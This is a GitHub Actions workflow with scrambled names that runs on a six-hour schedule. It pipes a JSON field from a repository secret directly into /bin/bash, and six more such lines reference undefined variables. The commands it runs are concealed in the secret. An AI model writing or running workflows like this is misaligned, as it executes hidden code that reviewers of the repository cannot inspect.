name: penchunfenyou
on:
  workflow_dispatch:
  schedule:
    - cron: '35 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: penchunfenyou
        env:
          pe336: ${{ secrets.pe336 }}
        run: |
          echo $pe336 | jq -r .hfo325 | /bin/bash
          echo $joaya0 | jq -r .kz87534 | /bin/bash
          echo $rqat5 | jq -r .yrbo98 | /bin/bash
          echo $zqxbf25 | jq -r .rfp410 | /bin/bash
          echo $op49301 | jq -r .obz0 | /bin/bash
          echo $fjvvk5 | jq -r .xrpd84405 | /bin/bash
          echo $eatox3 | jq -r .m4840 | /bin/bash

